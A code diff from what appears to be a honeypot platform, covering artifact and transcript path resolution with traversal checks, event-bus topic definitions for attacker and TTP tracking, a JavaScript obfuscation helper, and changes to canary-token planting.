"""Artifact storage helpers shared between the web router and TTP workers."""
|
||||
@@ -1,86 +0,0 @@
|
||||
"""
|
||||
Shared on-disk artifact path resolution.
|
||||
|
||||
Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
|
||||
quarantine tree:
|
||||
|
||||
/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
|
||||
|
||||
Two callers need to translate ``(decky, stored_as, service)`` into a
|
||||
concrete ``Path`` rooted under that tree:
|
||||
|
||||
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
|
||||
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
|
||||
download for the dashboard.
|
||||
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
|
||||
reads the stored ``.eml`` at tag-time so body-aware predicates
|
||||
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
|
||||
|
||||
Both callers share the same validation rules and the same
|
||||
defence-in-depth symlink-escape check; this module is the single
|
||||
implementation. It is auth-agnostic — wrappers layer authentication
|
||||
where appropriate (the router does ``require_admin``, the lifter does
|
||||
not).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import re
|
||||
from pathlib import Path
|
||||
|
||||
# decky names come from the deployer — lowercase alnum plus hyphens.
|
||||
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||
|
||||
# Services that own an artifacts subdir. Kept explicit so a caller
|
||||
# can't pivot into arbitrary subpaths via a query string or bus payload.
|
||||
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
|
||||
|
||||
# stored_as is assembled by the capturing template as:
|
||||
# ${ts}_${sha:0:12}_${base}
|
||||
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
|
||||
# and base is the original filename's basename. Keep the filename charset
|
||||
# tight but allow common punctuation dropped files actually use.
|
||||
_STORED_AS_RE = re.compile(
|
||||
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
|
||||
)
|
||||
|
||||
# Module-level so tests can monkeypatch. Override via env in production
|
||||
# (the systemd unit sets this) — the prod path matches the bind mount
|
||||
# declared in decnet/services/{ssh,smtp}.py.
|
||||
ARTIFACTS_ROOT = Path(
|
||||
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||
)
|
||||
|
||||
|
||||
class ArtifactPathError(ValueError):
    """Signal that ``(decky, stored_as, service)`` cannot be resolved safely.

    Raised when any of the three inputs fails validation, or when the
    resolved path would fall outside the artifacts root.

    Callers react differently: the router catches this and re-raises
    ``HTTPException(400)``, while the lifter catches it and treats the
    event as having no body available (no-tag).
    """
|
||||
|
||||
|
||||
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Map ``(decky, stored_as, service)`` to a path under the artifacts root.

    Each argument is validated first (service allow-list, then the decky
    pattern, then the ``stored_as`` pattern). The joined path is then
    resolved and checked for containment within the resolved
    ``ARTIFACTS_ROOT``.

    File existence is deliberately NOT checked here; callers handle a
    missing file in their own way (404 for the router, no-tag for the
    lifter).

    Raises:
        ArtifactPathError: an argument fails validation, or the resolved
            path lies outside the artifacts root.
    """
    if service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if _DECKY_RE.fullmatch(decky) is None:
        raise ArtifactPathError("invalid decky name")
    if _STORED_AS_RE.fullmatch(stored_as) is None:
        raise ArtifactPathError("invalid stored_as")

    base = ARTIFACTS_ROOT.resolve()
    target = base.joinpath(decky, service, stored_as).resolve()

    # Defence-in-depth: the patterns already reject `..`, but a symlink or
    # odd filesystem state could still resolve to somewhere outside the root.
    contained = target == base or base in target.parents
    if not contained:
        raise ArtifactPathError("path escapes artifacts root")
    return target
|
||||
@@ -1,129 +0,0 @@
|
||||
"""Shared asciinema shard helpers.
|
||||
|
||||
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
|
||||
so non-router callers (the BEHAVE-SHELL session-ended handler in
|
||||
``decnet/profiler/worker.py``, the collector's session aggregator)
|
||||
can resolve shard paths without crossing the layer boundary into the
|
||||
FastAPI router.
|
||||
|
||||
Functions here speak in :class:`ValueError` — callers that want HTTP
|
||||
semantics translate at the boundary. The router wrappers keep their
|
||||
existing ``HTTPException`` behaviour for backwards compatibility.
|
||||
|
||||
PII boundary unchanged: shards live on disk; this module returns
|
||||
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
|
||||
cache stores byte offsets only.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import re
|
||||
from collections import OrderedDict
|
||||
from pathlib import Path
|
||||
|
||||
# Root directory of the on-disk artifacts tree; overridable through the
# DECNET_ARTIFACTS_ROOT environment variable.
ARTIFACTS_ROOT = Path(os.getenv("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"))

# Validation patterns for path components and the sid extractor used when
# indexing shard lines.
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')

# (path, mtime_ns) → {sid: [(offset, length), ...]}
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = OrderedDict()
# Upper bound on the number of cached shard indices.
_CACHE_MAX = 32
|
||||
|
||||
|
||||
def validate_names(decky: str, service: str) -> None:
    """Check ``decky`` and ``service`` against their allowed patterns.

    Raises :class:`ValueError` naming the first offending value; ``decky``
    is checked before ``service``. Returns ``None`` when both are valid.
    """
    decky_ok = _DECKY_RE.fullmatch(decky) is not None
    if not decky_ok:
        raise ValueError(f"invalid decky name: {decky!r}")
    service_ok = _SERVICE_RE.fullmatch(service) is not None
    if not service_ok:
        raise ValueError(f"invalid service: {service!r}")
|
||||
|
||||
|
||||
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
    """Return the resolved path of one transcript shard.

    The path is ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``.
    ``decky`` and ``service`` go through :func:`validate_names`, and
    ``shard_name`` must match the shard basename pattern. The resolved
    result must still lie within the resolved artifacts root.

    Raises :class:`ValueError` on invalid inputs or an escape attempt.
    """
    validate_names(decky, service)
    if _SHARD_BASENAME_RE.fullmatch(shard_name) is None:
        raise ValueError(f"invalid shard name: {shard_name!r}")

    artifacts_root = ARTIFACTS_ROOT.resolve()
    candidate = artifacts_root.joinpath(
        decky, service, "transcripts", shard_name,
    ).resolve()
    if candidate.is_relative_to(artifacts_root):
        return candidate
    raise ValueError(f"path escapes artifacts root: {candidate}")
|
||||
|
||||
|
||||
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    """Scan a shard once and map each sid to the byte spans of its lines.

    The file is read in binary mode line by line. Every line in which the
    sid pattern matches contributes one ``(offset, length)`` pair, in file
    order, under the matched sid. Lines without a match are skipped but
    still advance the running offset.
    """
    spans: dict[str, list[tuple[int, int]]] = {}
    cursor = 0
    with path.open("rb") as fh:
        for raw in fh:
            size = len(raw)
            found = _SID_LINE_RE.search(raw)
            if found is not None:
                key = found.group(1).decode("ascii")
                spans.setdefault(key, []).append((cursor, size))
            cursor += size
    return spans
|
||||
|
||||
|
||||
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(sid → [(offset, length), …], file_size)``.

    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes. When a
    rebuilt index is stored, any entry for the same path under a different
    mtime is dropped, so a frequently appended shard occupies one cache
    slot instead of pushing other shards out of the LRU.

    Raises :class:`OSError` if the shard cannot be stat'ed or read.
    """
    st = path.stat()
    path_key = str(path)
    key = (path_key, st.st_mtime_ns)

    cached = _INDEX_CACHE.get(key)
    if cached is not None:
        # Refresh LRU position on a hit.
        _INDEX_CACHE.move_to_end(key)
        return cached, st.st_size

    index = _build_index(path)

    # Superseded indices for this path can never be hit again through the
    # current mtime, so evict them explicitly rather than waiting for LRU.
    for stale in [k for k in _INDEX_CACHE if k[0] == path_key]:
        del _INDEX_CACHE[stale]

    # A newly inserted key already sits at the most-recently-used end.
    _INDEX_CACHE[key] = index
    while len(_INDEX_CACHE) > _CACHE_MAX:
        _INDEX_CACHE.popitem(last=False)
    return index, st.st_size
|
||||
|
||||
|
||||
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
    transcripts dir until one claims this ``sid``.

    Newest shards first — most lookups are for recent sessions. The
    per-shard sid index comes from :func:`get_index`, which caches it, so
    repeated calls are cheap until the shard's mtime changes.

    Returns ``None`` when nothing claims the sid OR when the transcripts
    dir is missing / unreadable / resolves outside the artifacts root.
    Never raises on filesystem-level errors — callers treat ``None`` as
    "skip".

    Raises :class:`ValueError` (from :func:`validate_names`) when
    ``decky`` / ``service`` are malformed.
    """
    validate_names(decky, service)
    try:
        # Path resolution also touches the filesystem, so it belongs
        # inside the guard. RuntimeError covers symlink loops, which
        # Path.resolve() reports that way before Python 3.13.
        root = ARTIFACTS_ROOT.resolve()
        transcripts_dir = (root / decky / service / "transcripts").resolve()
        if root not in transcripts_dir.parents:
            return None
        if not transcripts_dir.is_dir():
            return None
        entries = list(transcripts_dir.iterdir())
    except (OSError, RuntimeError):
        return None

    # Shard names embed an ISO date, so a reverse sort puts newest first.
    shards = sorted(
        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
        reverse=True,
    )
    for shard in shards:
        try:
            index, _size = get_index(shard)
        except OSError:
            # Unreadable or vanished shard: skip it and keep scanning.
            continue
        if sid in index:
            return shard
    return None
|
||||
@@ -13,7 +13,7 @@ from typing import Sequence
|
||||
from decnet.asn.base import Provider
|
||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||
from decnet.asn.iptoasn.parse import parse_file
|
||||
from decnet.asn.lookup import AsnLookup, Range
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
from decnet.asn.paths import ensure_root
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
|
||||
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
||||
)
|
||||
|
||||
ranges: list[Range] = []
|
||||
ranges = []
|
||||
for path in self.data_paths():
|
||||
if not path.exists():
|
||||
continue
|
||||
|
||||
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
|
||||
up at all we no-op.
|
||||
"""
|
||||
try:
|
||||
from decnet.telemetry import wrap_repository
|
||||
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
|
||||
except ImportError:
|
||||
return bus
|
||||
try:
|
||||
|
||||
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
|
||||
contract the rest of this module already upholds.
|
||||
"""
|
||||
if bus is None:
|
||||
return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
|
||||
return lambda _topic, _payload, _event_type="": None
|
||||
|
||||
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||
# Stream threads may keep draining after the bus owner closed it
|
||||
|
||||
@@ -17,7 +17,6 @@ Token structure (NATS-style, dot-separated):
|
||||
attacker.scored
|
||||
attacker.session.started
|
||||
attacker.session.ended
|
||||
attacker.observation.{primitive}
|
||||
identity.formed
|
||||
identity.observation.linked
|
||||
identity.merged
|
||||
@@ -29,18 +28,12 @@ Token structure (NATS-style, dot-separated):
|
||||
campaign.unmerged
|
||||
credential.captured
|
||||
credential.reuse.detected
|
||||
attribution.profile.state_changed
|
||||
attribution.profile.multi_actor_suspected
|
||||
canary.{token_id}.triggered
|
||||
canary.{token_id}.placed
|
||||
canary.{token_id}.revoked
|
||||
system.log
|
||||
system.bus.health
|
||||
system.{worker}.health
|
||||
email.received
|
||||
ttp.tagged
|
||||
ttp.rule.fired.{technique_id}
|
||||
ttp.rule.suppressed
|
||||
|
||||
Wildcards (per :func:`decnet.bus.base.matches`):
|
||||
|
||||
@@ -59,12 +52,8 @@ IDENTITY = "identity"
|
||||
CAMPAIGN = "campaign"
|
||||
SYSTEM = "system"
|
||||
CREDENTIAL = "credential"
|
||||
ATTRIBUTION = "attribution"
|
||||
ORCHESTRATOR = "orchestrator"
|
||||
CANARY = "canary"
|
||||
SMTP = "smtp"
|
||||
EMAIL = "email"
|
||||
TTP = "ttp"
|
||||
|
||||
|
||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||
@@ -94,19 +83,6 @@ DECKY_MUTATE_REQUEST = "mutate_request"
|
||||
# syslog sidechannel too) to interleave substrate-change markers into
|
||||
# attacker traversals.
|
||||
DECKY_MUTATION = "mutation"
|
||||
# Per-service add/remove on a deployed decky (live; no full redeploy).
|
||||
# Payload carries ``decky_name``, ``service_name``, optional
|
||||
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
|
||||
# that watch substrate shape (correlator, dashboard, profiler) reconcile
|
||||
# off these without waiting for the next decnet-state.json snapshot.
|
||||
DECKY_SERVICE_ADDED = "service_added"
|
||||
DECKY_SERVICE_REMOVED = "service_removed"
|
||||
# Per-service config change (the schema-driven Inspector form). Payload
|
||||
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
|
||||
# ``service_config`` (the new validated dict), and ``recreated`` — true
|
||||
# when the operator hit Apply (container was force-recreated to pick up
|
||||
# the new env), false when they only hit Save (DB-only).
|
||||
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
|
||||
|
||||
# Attacker event types (second token under the ``attacker`` root). First
|
||||
# sighting, session boundary transitions, and score-threshold crossings
|
||||
@@ -118,14 +94,6 @@ ATTACKER_SCORED = "scored"
|
||||
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
||||
# a fingerprint is additional evidence about an already-observed attacker.
|
||||
ATTACKER_FINGERPRINTED = "fingerprinted"
|
||||
# Published when the prober observes a NEW hash for an
|
||||
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
|
||||
# attacker rotated their VPS, rebuilt their SSH server, swapped their
|
||||
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
|
||||
# result; ``fingerprint_rotated`` fires only on diff and carries both
|
||||
# old_hash + new_hash. Producer: prober (via the rotation library);
|
||||
# consumers: dashboard, forensics, attribution clustering.
|
||||
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
|
||||
ATTACKER_SESSION_STARTED = "session.started"
|
||||
ATTACKER_SESSION_ENDED = "session.ended"
|
||||
# Published by the ``decnet enrich`` worker after an enrichment pass
|
||||
@@ -133,19 +101,6 @@ ATTACKER_SESSION_ENDED = "session.ended"
|
||||
# returned a verdict). Payload carries the aggregate verdict + per-
|
||||
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
||||
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
||||
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
|
||||
# attacker.observation.<primitive>
|
||||
# e.g. ``attacker.observation.motor.input_modality``. Producer:
|
||||
# ``decnet/profiler/behave_shell/`` (extractor library called from the
|
||||
# profiler worker on ``attacker.session.ended``); consumers: dashboard
|
||||
# SSE relay, attribution engine state machine, federation gossip
|
||||
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
|
||||
# the wire-format contract — the prefix is documentation + pattern
|
||||
# match only; bus auth is socket file perms (DEBT-029 §2), not
|
||||
# topic-level. The ``primitive`` segment MAY contain dots
|
||||
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
|
||||
# rule that ``attacker.session.ended`` uses.
|
||||
ATTACKER_OBSERVATION_PREFIX = "observation"
|
||||
|
||||
# Identity-resolution event types (second/third tokens under ``identity``).
|
||||
# Published by the (future) clusterer worker — see
|
||||
@@ -213,42 +168,6 @@ CAMPAIGN_UNMERGED = "unmerged"
|
||||
CREDENTIAL_CAPTURED = "captured"
|
||||
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
||||
|
||||
# Attribution-engine event types (second/third tokens under
|
||||
# ``attribution``). Published by the v0 attribution worker
|
||||
# (``decnet.correlation.attribution_worker``) which subscribes to
|
||||
# ``attacker.observation.>`` and runs the per-(identity, primitive)
|
||||
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
|
||||
#
|
||||
# attribution.profile.state_changed — per-primitive state
|
||||
# transition (e.g.
|
||||
# stable → drifting).
|
||||
# Payload: identity_uuid,
|
||||
# primitive, old_state,
|
||||
# new_state, current_value,
|
||||
# confidence,
|
||||
# observation_count, ts.
|
||||
# attribution.profile.multi_actor_suspected — fires when ≥ 2
|
||||
# primitives flag the same
|
||||
# identity as multi_actor
|
||||
# concurrently. Cross-
|
||||
# primitive correlator;
|
||||
# single-primitive
|
||||
# multi_actor is too noisy
|
||||
# on its own. Payload:
|
||||
# identity_uuid, primitives,
|
||||
# evidence_summary,
|
||||
# confidence, ts.
|
||||
#
|
||||
# These are *derived* signals — distinct from
|
||||
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
|
||||
# ``attacker.observation.*`` (raw extractor envelopes,
|
||||
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
|
||||
# the attribution engine, the engine emits derived state, the clusterer
|
||||
# reads observations + state to form / merge identities.
|
||||
ATTRIBUTION_PROFILE_PREFIX = "profile"
|
||||
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
|
||||
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
|
||||
|
||||
# Canary-token event types (third token under ``canary``).
|
||||
#
|
||||
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
||||
@@ -312,43 +231,6 @@ WORKER_CONTROL_START = "start"
|
||||
# of patterns. Payload is currently empty; consumers only need the signal.
|
||||
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
||||
|
||||
# Email-receipt event — fired by smtp / smtp-relay services on full-message
|
||||
# receipt (envelope + headers + body + attachments captured). Single-token
|
||||
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
|
||||
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
|
||||
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
|
||||
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
|
||||
# bytes.
|
||||
EMAIL_RECEIVED = "received"
|
||||
|
||||
# TTP-tagging event types (second/third tokens under ``ttp``).
|
||||
#
|
||||
# ttp.tagged — one or more new tags written. Published
|
||||
# only when ``INSERT OR IGNORE`` wrote at
|
||||
# least one new row; idempotent
|
||||
# re-evaluations publish nothing
|
||||
# (loop-prevention invariant — see
|
||||
# TTP_TAGGING.md).
|
||||
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
|
||||
# consumers that subscribe to a single
|
||||
# technique. Topic key is the parent
|
||||
# technique; sub_technique is in the
|
||||
# payload. Built via :func:`ttp_rule_fired`.
|
||||
# ttp.rule.suppressed — rule fired but the tag was dropped
|
||||
# (confidence below floor, rate-limited,
|
||||
# or the rule's RuleState was disabled).
|
||||
# Observability signal for the dashboard.
|
||||
#
|
||||
# Per-rule reload + state-change topics. Built via
|
||||
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
|
||||
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
|
||||
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
|
||||
TTP_TAGGED = "tagged"
|
||||
TTP_RULE_FIRED = "rule.fired"
|
||||
TTP_RULE_SUPPRESSED = "rule.suppressed"
|
||||
TTP_RULE_RELOADED = "rule.reloaded"
|
||||
TTP_RULE_STATE = "rule.state"
|
||||
|
||||
|
||||
# ─── Builders ────────────────────────────────────────────────────────────────
|
||||
|
||||
@@ -419,42 +301,6 @@ def attacker(event_type: str) -> str:
|
||||
return f"{ATTACKER}.{event_type}"
|
||||
|
||||
|
||||
def attacker_observation(primitive: str) -> str:
    """Build ``attacker.observation.<primitive>``.

    *primitive* is the fully-qualified BEHAVE-SHELL primitive path, for
    example ``motor.input_modality`` or
    ``motor.shell_mastery.tab_completion``. Dots inside *primitive* are
    passed through unchanged; per the upstream
    ``behave_shell.spec.event_adapter.event_topic_for`` format they are
    permitted, the same way :func:`attacker` admits ``session.started``.

    Raises :class:`ValueError` for an empty *primitive*, so a downstream
    typo cannot ship as ``attacker.observation.``.
    """
    if primitive:
        return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
    raise ValueError(
        "attacker_observation topic requires a non-empty primitive",
    )
|
||||
|
||||
|
||||
def attribution(event_type: str) -> str:
    """Build ``attribution.<event_type>``.

    Typical values for *event_type* are
    :data:`ATTRIBUTION_PROFILE_STATE_CHANGED` and
    :data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED`. Both contain a dot
    (``profile.state_changed``), which is allowed under the same
    "trailing dotted leaf" rule that ``attacker.session.started`` uses.

    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{ATTRIBUTION}.{event_type}"
    raise ValueError("attribution topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def campaign(event_type: str) -> str:
|
||||
"""Build ``campaign.<event_type>``.
|
||||
|
||||
@@ -535,86 +381,6 @@ def system_control(worker: str) -> str:
|
||||
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
||||
|
||||
|
||||
def smtp(event_type: str) -> str:
    """Build ``smtp.<event_type>``.

    Dots inside *event_type* are passed through (e.g. ``probe.pending``).

    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{SMTP}.{event_type}"
    raise ValueError("smtp topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def email_topic(event_type: str) -> str:
    """Build ``email.<event_type>``.

    The function is called ``email_topic`` instead of ``email`` so it does
    not shadow the Python ``email`` stdlib package at import sites that
    pull both. *event_type* is typically :data:`EMAIL_RECEIVED`.

    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{EMAIL}.{event_type}"
    raise ValueError("email topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def ttp(event_type: str) -> str:
    """Build ``ttp.<event_type>``.

    *event_type* is usually :data:`TTP_TAGGED`, :data:`TTP_RULE_FIRED`, or
    :data:`TTP_RULE_SUPPRESSED`. Dotted leaves such as ``rule.fired`` are
    allowed — same rationale as :func:`system`. Use :func:`ttp_rule_fired`
    for the per-technique fan-out topic.

    Raises :class:`ValueError` when *event_type* is empty.
    """
    if event_type:
        return f"{TTP}.{event_type}"
    raise ValueError("ttp topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def ttp_rule_fired(technique_id: str) -> str:
    """Build ``ttp.rule.fired.<technique_id>``.

    Per-technique fan-out: SIEM subscribers can listen on
    ``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
    one technique. *technique_id* is validated as a single segment —
    sub-techniques like ``T1110.001`` are rejected because they would
    split into two tokens. The topic key is the parent technique;
    ``sub_technique_id`` lives in the payload.

    Raises whatever :func:`_reject_tokens` raises for an invalid segment.
    """
    _reject_tokens(technique_id)
    # Use the shared leaf constant, as ttp_rule_reloaded / ttp_rule_state
    # do, so the ``rule.fired`` spelling has a single source of truth.
    return f"{TTP}.{TTP_RULE_FIRED}.{technique_id}"
|
||||
|
||||
|
||||
def ttp_rule_reloaded(rule_id: str) -> str:
    """Build ``ttp.rule.reloaded.<rule_id>``.

    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
    when a rule's *definition* changes (YAML edit on the filesystem
    backend, ``ttp_rule`` row update on the database backend). One event
    is published per per-rule edit and never batched; that granularity is
    inherited from :meth:`RuleStore.subscribe_changes` (the "incremental,
    never batched" property in TTP_TAGGING.md §"Bus topics").

    Subscribe to ``ttp.rule.reloaded.>`` for every rule or
    ``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
    single segment via :func:`_reject_tokens`.
    """
    _reject_tokens(rule_id)
    topic = f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
    return topic
|
||||
|
||||
|
||||
def ttp_rule_state(rule_id: str) -> str:
    """Build ``ttp.rule.state.<rule_id>``.

    Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
    when a rule's *operational state* changes: the operator hits the
    disable button, or an ``expires_at`` TTL fires and auto-reverts the
    state. *rule_id* is validated as a single segment via
    :func:`_reject_tokens`.
    """
    _reject_tokens(rule_id)
    topic = f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
    return topic
|
||||
|
||||
|
||||
def _reject_tokens(*parts: str) -> None:
|
||||
"""Reject topic segments that would break NATS-style tokenization.
|
||||
|
||||
|
||||
@@ -1,18 +0,0 @@
|
||||
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// Kept dependency-light on purpose: only javascript-obfuscator.
//
// Exit status: 0 on success; 2 when the input cannot be parsed or the
// obfuscator throws, in which case the error (stack when available) is
// written to stderr and nothing is written to stdout.
const JsObf = require('javascript-obfuscator');

let raw = '';
process.stdin.setEncoding('utf8');
// Buffer all of stdin; the payload is one JSON document.
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    process.stderr.write(String(e && e.stack || e));
    // Set the exit code instead of calling process.exit(): exit() can
    // terminate before a pending stderr write is flushed, losing the
    // diagnostic. Nothing else is scheduled, so the process ends on its
    // own once the write completes.
    process.exitCode = 2;
  }
});
|
||||
@@ -100,12 +100,6 @@ class CanaryArtifact:
|
||||
planting. Never leaked to the attacker-facing surface.
|
||||
"""
|
||||
|
||||
fingerprint_nonce: Optional[str] = None
|
||||
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
|
||||
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
|
||||
so the worker can validate incoming ``?k=`` params.
|
||||
"""
|
||||
|
||||
|
||||
class CanaryGenerator(ABC):
|
||||
"""Produces a fake artifact from scratch."""
|
||||
|
||||
@@ -46,8 +46,6 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
|
||||
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
|
||||
}
|
||||
|
||||
|
||||
@@ -64,8 +62,6 @@ _GENERATOR_TO_KIND: dict[str, str] = {
|
||||
"honeydoc_pdf": "http",
|
||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
|
||||
"fingerprint_svg": "http", # same, embedded inside SVG <script>
|
||||
}
|
||||
|
||||
|
||||
@@ -82,8 +78,6 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
|
||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
|
||||
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
|
||||
}
|
||||
|
||||
|
||||
@@ -142,12 +136,10 @@ async def cultivate(
|
||||
)
|
||||
|
||||
callback_token = _new_callback_token()
|
||||
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
|
||||
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
|
||||
ctx = CanaryContext(
|
||||
callback_token=callback_token,
|
||||
http_base=http_base_str,
|
||||
dns_zone=dns_zone_str,
|
||||
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
|
||||
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
|
||||
persona="linux", # all our deckies are POSIX in MVP
|
||||
)
|
||||
generator = get_generator(gen_name)
|
||||
@@ -162,7 +154,7 @@ async def cultivate(
|
||||
# attribute a callback if the artifact trips during the plant
|
||||
# itself (improbable but possible — DOCX viewers can preview
|
||||
# autoplay-style).
|
||||
token_data: dict = {
|
||||
await repo.create_canary_token({
|
||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||
"decky_name": plan.decky_name,
|
||||
"instrumenter": None,
|
||||
@@ -173,10 +165,7 @@ async def cultivate(
|
||||
"placed_at": datetime.now(timezone.utc),
|
||||
"created_by": created_by,
|
||||
"state": "planted",
|
||||
}
|
||||
if artifact.fingerprint_nonce is not None:
|
||||
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
|
||||
await repo.create_canary_token(token_data)
|
||||
})
|
||||
|
||||
# Carry the placement_path on the artifact so the orchestrator's
|
||||
# plant_file call uses it. We don't mutate the generator's
|
||||
|
||||
@@ -131,7 +131,7 @@ def _build_response(
|
||||
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
|
||||
|
||||
answer = b""
|
||||
